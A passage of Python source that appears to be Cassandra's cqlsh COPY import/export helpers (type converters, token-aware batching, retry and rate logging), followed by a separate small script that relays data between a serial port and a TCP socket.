else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
def _get_protector(self, t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: unicode(protect_value(v), self.encoding)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split into a list of values whenever we encounter a separator but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. We expect val to be at least
2 characters long (the two outer parentheses).
"""
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if c == '{' or c == '[' or c == '(':
level += 1
elif c == '}' or c == ']' or c == ')':
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" + # [HH:MM[:SS[.NNNNNN]]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1e3) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return list(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
We need to pass to BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
"""
class ImmutableDict(frozenset):
iteritems = frozenset.__iter__
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
"""
vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
ret_type = namedtuple(ct.typename, [unprotect(v[0]) for v in vals])
return ret_type(*tuple(convert(t, v[1]) for t, v in zip(ct.subtypes, vals)))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=long),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=long),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else ("0" if self.is_counter else "NULL")
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception, e:
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (val, e.message))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](v), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
l = len(val)
pk_values.append(struct.pack(">H%dsB" % l, l, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in xrange(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = params['valid_columns']
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = None
return self._session
def run(self):
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
self.report_error(exc)
finally:
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
except Exception, exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception, exc:
print "Failed to make batch statement: {}".format(exc)
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch = self.maybe_inject_failures(batch)
if failed_batch:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append("%s=%s" % (self.valid_columns[i], value))
else:
set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))
full_query_text = query % (','.join(set_clause), ' AND '.join(where_clause))
statement.add(full_query_text)
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(False, query % (','.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception, err:
errors[err.message].append(r)
return None
converted_rows = filter(None, [convert_row(r) for r in rows])
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
return None # carry on as normal
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
it may not be possible, in this case it helps to increase the CHUNK SIZE but up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception, e:
errors[e.message].append(row)
if errors:
for msg, rows in errors.iteritems():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.iteritems():
if len(rows) > min_batch_size:
for i in xrange(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[filter_replicas(replicas[ring_pos])[:1]].extend(rows)
# Now send the batches by replica
for replicas, rows in rows_by_replica.iteritems():
for i in xrange(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
self.outmsg.send(ImportTaskError(err.__class__.__name__, err.message, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
remaining_time = time_difference - self.update_interval
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
|
serial2tcp.py
|
#(C)2002-2003 Chris Liechti <cliechti@gmx.net>
#redirect data from a TCP/IP connection to a serial port and vice versa
#requires Python 2.2 'cause socket.sendall is used
import sys
import os
import serial
import threading
import socket
import logging
import signal
from argparse import ArgumentParser
from serial.tools.list_ports import comports
import colorama
SERIAL_AUTO_VENDOR_ID = 0x0403
SERIAL_AUTO_PRODUCT_ID = 0x6010
def find_serial():
available = comports()
if len(available) == 0:
print("no com ports available - is board powered and connected?")
raise SystemExit
available = [ser for ser in available if ser.vid == SERIAL_AUTO_VENDOR_ID and ser.pid == SERIAL_AUTO_PRODUCT_ID]
if len(available) == 0:
print("no com port matching vendor/product ids available - is board powered and connected?")
raise SystemExit
if len(available) > 1:
# pick the lowest interface in multiple interface devices
if hasattr(available[0], 'device_path'):
device = min([(x.device_path.split('/')[:-1], x) for x in available])[1]
else:
device = min([(x.device, x) for x in available])[1]
else:
device = available[0]
comport = device.device
print("automatic comport selection: {}".format(comport))
return comport
log = logging.getLogger('serial2tcp')
log.setLevel(logging.ERROR)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s')
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
ch.setFormatter(formatter)
log.addHandler(ch)
colorama.init()
RED_START = "\033[1;31m"
RED_END = "\033[0;0m"
verbose = False
class Redirector:
def __init__(self, serial, s):
self.serial = serial
self.socket = s
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 20 * 1024 * 1024)
def shortcut(self):
"""connect the serial port to the tcp port by copying everything
from one side to the other"""
self.alive = True
self.thread_read = threading.Thread(target=self.reader)
self.thread_read.setDaemon(1)
self.thread_read.start()
self.writer()
def reader(self):
"""loop forever and copy serial->socket"""
while self.alive:
try:
#read one, blocking
data = self.serial.read(1)
#look if there is more
n = self.serial.inWaiting()
if n:
#and get as much as possible
data = data + self.serial.read(n)
if data:
#if b'EM\x03' in data: print("probably an ACK")
#send it over TCP
self.socket.sendall(data)
except socket.error as msg:
log.error(msg)
#probably got disconnected
break
self.alive = False
def writer(self):
"""loop forever and copy socket->serial"""
while self.alive:
try:
data = self.socket.recv(1)
if not data:
break
self.serial.write(data) # get a bunch of bytes and send them
except socket.error as msg:
log.error(repr(msg))
break
except Exception as e:
log.critical(repr(e))
break
self.alive = False
self.thread_read.join()
def stop(self):
"""Stop copying"""
if self.alive:
self.alive = False
self.thread_read.join()
if __name__ == '__main__':
descr = 'WARNING: You have to allow connections only from the addresses' \
'in the "--allow-list" option. e.g.' \
'--allow-list="10.0.0.1, 172.16.0.1, 192.168.0.1"\n' \
'NOTICE: This service supports only ' \
'one tcp connection per instance.'
usage = "USAGE: %(prog)s [options]\n\nSimple Serial to Network (TCP/IP)" \
"redirector."
parser = ArgumentParser(usage=usage, description=descr)
parser.add_argument("-p", "--port", dest="serial",
help="Serial URL or port, a number, default = '/dev/tty0'", type=str, default='auto')
parser.add_argument("-b", "--baud", dest="baudrate",
help="Baudrate, default 115200", default=115200, type=int)
parser.add_argument("-r", "--rtscts", dest="rtscts",
help="Enable RTS/CTS flow control (default off)", action='store_true', default=False)
parser.add_argument("-x", "--xonxoff", dest="xonxoff",
help="Enable software flow control (default off)", action='store_true', default=False)
parser.add_argument("-P", "--localport", dest="port",
help="TCP/IP port on which to run the server (default 9100)", type=int, default=9100)
parser.add_argument("-l", "--listen", dest="listen",
help="Listen address on which to run the server (default '127.0.0.1')", type=str, default='127.0.0.1')
parser.add_argument(
'--access-list', dest='acl', type=str, default="127.0.0.1",
help="List of IP addresses e.g '127.0.0.1, 192.168.0.2'")
options = parser.parse_args()
if options.serial == 'auto':
options.serial = find_serial()
access_list = set([ip.strip(" ") for ip in options.acl.split(',')])
log.info("TCP/IP to Serial redirector (Ctrl-C to quit)")
try:
ser = serial.serial_for_url(
options.serial,
baudrate=options.baudrate,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
#required so that the reader thread can exit
timeout=1
)
except serial.SerialException as e:
log.fatal("Could not open serial port %s: %s" % (options.serial, e))
sys.exit(1)
# TODO: necessary?
ser.flushInput()
